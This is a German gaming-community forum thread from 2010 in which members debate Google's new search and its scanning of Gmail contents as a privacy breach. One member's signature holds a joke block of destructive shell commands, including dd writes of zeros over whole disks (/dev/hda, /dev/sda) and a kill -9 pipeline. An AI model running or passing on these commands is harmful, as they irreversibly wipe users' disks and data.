Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 14
Seite [1]
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Thema - 10.09.2010 um 15:30 Uhr
Fazit: Google macht mit der neuen Suche einen gewaltigen Schritt nach vorne! Die Suche ist noch schneller und bequemer geworden. In Deutschland funktioniert die neue Suche noch nicht vollständig, dies soll aber in den nächsten Tagen klappen. Der Komfort hat auch seinen Preis: Damit Google bereits bei der Eingabe eines Wortes exakt erahnen kann, was der Nutzer sucht, muss die Suchmaschine möglichst viel über den Mensch hinter der Tastatur wissen. Dies erreicht Google, indem zum Beispiel die Inhalte von E-Mails bei Google Mail automatisch ausgewertet werden.

Das heißt also: Google liest meine eMails.
Schonmal was von Datenschutz gehört ? Sorry, aber ich würde mir jetzt keine Mails mehr an meinen existenten Googlemailacc schicken lassen.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.
Inaktiv
bFeeee


Just nerd



Herkunft: Hamm
Beiträge: 944
# Antwort: 1 - 10.09.2010 um 15:38 Uhr
lol wasn das fürn quark ?


------------------
Grüße bFeee

Inaktiv
|
Bela


Try to beat me





Beiträge: 120
# Antwort: 2 - 10.09.2010 um 15:55 Uhr
Ok bei allem was recht is Google streetview usw aber das geht echt zuweit...


------------------




Falls noch irgendwas ist oder du fragen hast
xfire: belab1992
email: dominik (dot) ritz (at) gmx (dot) de

Inaktiv
|
Tress13


Highlander




Herkunft: Lüdenscheid
Beiträge: 3048
# Antwort: 3 - 10.09.2010 um 16:00 Uhr
Ich will das auch nicht !!!
Privatsphäre muss sein !!!



------------------


www.iv-gaming.de | www.iv-artwork.de

Inaktiv
|
Jam2 ClanSphere Team


Highlander




Herkunft: Pösing
Beiträge: 3291
# Antwort: 4 - 10.09.2010 um 16:01 Uhr
ich stell mir das mal vor.... du suchst irgendwas und dann kommen erstmal 100 viagra seiten weil du ja mit dem zusammengespammt wirst


aber ja... street view ist n gutes projekt in meinen augen, aber emails? nein danke


------------------
Gruß/ Best regards
Martin 'Jam2' Ederer

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
Miraculix


Going for pro




Herkunft: Füssen
Beiträge: 429
# Antwort: 5 - 10.09.2010 um 16:03 Uhr
Wie wärs denn mit ner Webcam im Schlafzimmer.


------------------
greeetz Miraculix

Band-Page -> www.muddleheaded-scum.de

Inaktiv
|
Fr33z3m4n ClanSphere Team
Thread-Ersteller


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 6 - 10.09.2010 um 16:05 Uhr
Verwendung

* Google verwaltet und verarbeitet Ihr Google Mail-Konto und dessen Inhalt, um Ihnen den Google Mail-Dienst anbieten zu können und um diesen Service zu verbessern. Der Google Mail-Dienst präsentiert relevante Werbung und verwandte Links auf Grundlage der IP-Adresse, des Inhalts der Nachrichten und anderer Daten im Zusammenhang mit Ihrer Verwendung von Google Mail.
* Die Computer von Google werten die Informationen in Ihren Nachrichten aus verschiedenen Gründen aus, unter anderem zur Formatierung und Darstellung der Informationen für Sie, zur Schaltung von Anzeigen und verwandten Links, zur Vermeidung von unerwünschten Massen-E-Mails (Spam), zur Sicherung Ihrer Nachrichten und zu anderen Zwecken im Zusammenhang mit dem Angebot von Google Mail.
* Google wird Ihnen eventuell Informationen im Zusammenhang mit Ihrem Google Mail-Konto oder anderen Google-Diensten senden.

http://gmail.google.com/mail/help/intl/de/privacy.html


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Zuletzt editiert von Fr33z3m4n ClanSphere Team am 10.09.2010 um 16:05 Uhr (1x Editiert)
Inaktiv
|
edi75


Try to beat me





Beiträge: 178
# Antwort: 7 - 10.09.2010 um 16:07 Uhr
Einfach den bestehenden maill acc bei google löschen
Nein im ernst das geht inder tat zu weit und spätestens jetzt sollten bei ein paar Datenschutzbeauftragten die alarmläuten klingeln und sie zur tat schreiten.


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1401
# Antwort: 8 - 10.09.2010 um 16:09 Uhr
Google mutiert so langsam aber sicher zur Stasi.
Ich habe ja nun auch meine GMail Adresse, aber ich glaube die werde ich dann nicht weiter nutzen.

Demnächst stellen sie dann einen neuen Präsidenten vor, mit Schnauzbart und anderen "komischen" Sichtweisen des Lebens.



PS: (Ich distanziere mich vor flaschen Interpretationen meines Satzes)


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Offline
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 9 - 10.09.2010 um 17:36 Uhr
Ähh das Google Mails analysiert und mitliest war doch shcon mit dem Start von GMail klar ... warum jetzt beschweren?


Inaktiv
|
Fr33z3m4n ClanSphere Team
Thread-Ersteller


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 10 - 10.09.2010 um 18:04 Uhr
10.09.2010 um 17:36 Uhr - Mc.Alcatraz:
Ähh das Google Mails analysiert und mitliest war doch shcon mit dem Start von GMail klar ... warum jetzt beschweren?

Weil das wohl nicht jedem von Anfang klar war.
Und wäre das jedem klar gewesen, würden sicherlich auch nicht so viele einen GMail Acc haben. Oder diese Leute wissen nicht, was es heißt, gegen Datenschutz zu verstoßen, oder generelles mitlesen von eMails.
Egal ob zur Analyse oder nicht, das alleinge Auslesen dieser eMail ist ein Vertrauensbruch.

@Alci und wenn du damit einverstanden bist, dass deine privaten Daten für irgendwelche Analysen missbraucht werden, kannst du ihn ja weiterhin nutzen, es zwingt dich ja niemand dazu, diesen zu löschen.

Allein die Tatsache, dass wenn ich bei Google was suche, dass der Suchfilter meine privaten analysierten Daten aus meinen GMails, dazu nutzt, ist schon mehr als Fragwürdig, in wie fern die eMails analysiert werden.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 11 - 10.09.2010 um 18:32 Uhr
Naja egal ist mir das nich darum hab ich ja nen Privaten Maill Acc und eben einen von Google, bzw überhaupt nen Google Account.
Aber das man Googles DIenstleistungen mit seinen Daten bezahlt, ist ja nun echt nix neues.

Nun ja seis so, niemand wird gezwungen Google zu nutzen, jeder mach tes freiwllig, von daher ist denne eigtl kein Vorwurf zu machen. Wenn man sich registriert kann man sich den Datenschutz ja durchlesen, wenn man ihn hscon akzeptiert


Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6115
# Antwort: 12 - 10.09.2010 um 22:53 Uhr
Ähm ja, wo ist das Problem?
Wie alci schon sagte, war das seit Jahren bekannt und wer sich anmeldet ohne die AGB zulesen hat halt Pech?

Und ganz im ernst Leute, was denkt ihr denn wie lange es dauern wird bis auch die anderen Anbieter nachziehen werden? Auf Kunden zugeschnittenen Werbung ist nunmal der virtuelle Absatzmarkt der Zukunft.


Zuletzt editiert von equaL ClanSphere Team am 10.09.2010 um 22:55 Uhr (1x Editiert)
Offline
|
Sylar


Try to beat me





Beiträge: 181
# Antwort: 13 - 11.09.2010 um 22:42 Uhr
Deswegen hab ich meinen eigenen Mailserver

Scherz beiseite, aber die Art von Google finde ich auch nicht in Ordnung.
Ich weiß zwar keine Details, aber Google speichert angeblich absolut alle Suchanfragen und ordnet diese Anhand des genutzten IP-Adress Bereiches den einzelnen Leuten wieder zu usw. usw.


------------------


Inaktiv
|
Fr33z3m4n ClanSphere Team
Thread-Ersteller


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 14 - 11.09.2010 um 23:14 Uhr
Wie alci schon sagte, war das seit Jahren bekannt und wer sich anmeldet ohne die AGB zulesen hat halt Pech?

Steht nicht in den AGBs, sondern in den Datenschutzbestimmungen ^^
Finde die aber ziemlich, naja Ami Konzern halt ne *g*


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Antworten: 14
Seite [1]


Sie müssen sich registrieren, um zu antworten.